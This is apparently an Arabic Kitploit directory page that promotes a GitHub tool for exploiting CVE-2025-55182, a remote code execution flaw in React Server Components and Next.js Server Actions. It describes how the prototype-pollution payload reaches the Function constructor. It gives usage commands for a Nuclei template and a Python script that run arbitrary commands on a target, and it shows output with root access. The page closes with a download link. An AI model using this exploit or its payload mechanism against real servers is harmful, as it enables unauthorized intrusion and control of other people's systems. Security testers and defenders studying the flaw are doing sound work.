Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface | Kitploit
أدوات/GitHubGitHub/sickwell/cve-2025-55182
Vulnerability ScannersCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubsickwell/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface

عرض المستودع
136منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 - استغلال تنفيذ التعليمات البرمجية عن بُعد (RCE) في React و Next.js Server Actions

أداة متكاملة لاستغلال ومسح ثغرة CVE-2025-55182 في React/Next.js Server Actions من خلال تنفيذ التعليمات البرمجية عن بُعد.

الإثبات الأصلي (PoC): Spritualkb/CVE-2025-55182-exp

نظرة عامة

CVE-2025-55182 هي ثغرة حرجة من نوع تلوث النموذج الأولي (Prototype Pollution) في React Server Components تتيح تنفيذ التعليمات البرمجية عن بُعد. يوفر هذا المستودع أداتين: المسح الآلي (قالب Nuclei) والاستغلال اليدوي (سكربت Python).

آلية الثغرة:

يستغل هذا الكود ثغرة تلوث النموذج الأولي في إلغاء تسلسل بروتوكول React Flight. إذ يلوث Object.prototype.then عبر "$1:__proto__:then" ويحصل على وصول إلى مُنشئ Function من خلال تعيين _formData.get إلى "$1:constructor:constructor"، ثم يحقن تعليمات برمجية خبيثة عبر _prefix يتم تنفيذها بواسطة Function().

الأدوات

1. قالب Nuclei (cve-2025-55182.yaml)

ماسح ثغرات آلي ينفذ أمر id ويستخرج الناتج عبر ترويسة X-Action-Redirect.

الاستخدام:

root@kitploit:~
nuclei -u http://target.com:3000 -t cve-2025-55182.yaml

الميزات:

  • تنفيذ أمر اختبار (id) للتحقق من RCE
  • استخراج مخرجات الأمر من ترويسات الاستجابة
  • مؤشرات كشف متعددة (رمز الحالة 303، ترويسات إعادة التوجيه، أنماط الأخطاء)

2. سكربت استغلال RCE بلغة Python (CVE-2025-55182.py)

سكربت استغلال RCE متكامل ينفذ أوامر عشوائية ويستخرج الناتج.

الاستخدام:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

الميزات:

  • تنفيذ أوامر عشوائية
  • استخراج تلقائي للناتج من ترويسة X-Action-Redirect
  • دعم صيغ HTTP/HTTPS و IP:PORT
  • خيار تجاوز التحقق من شهادة SSL
  • مخرجات نظيفة ومنسقة

نتائج الاختبار

قالب Nuclei

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

استغلال Python

root@kitploit:~
$ python3 CVE-2025-55182.py http://localhost:3001 -c "id"

============================================================
CVE-2025-55182 RCE Exploit
React Server Components Remote Code Execution
============================================================

[*] Target: http://localhost:3001
[*] Command: id
[*] Building payload...
[*] Sending exploit payload...

============================================================
[+] Command executed successfully!
============================================================
[+] Command Output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
------------------------------------------------------------

============================================================
[*] Exploitation attempt completed
============================================================

الإصدارات المتأثرة

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (App Router مع Server Actions)

الاعتمادات

  • الإثبات الأصلي (PoC): Spritualkb - CVE-2025-55182-exp

المراجع

  • التنبيه الأمني من React
  • Next.js على GitHub

إخلاء مسؤولية

لأغراض التعليم والاختبار المصرح به فقط

تنزيل الأداة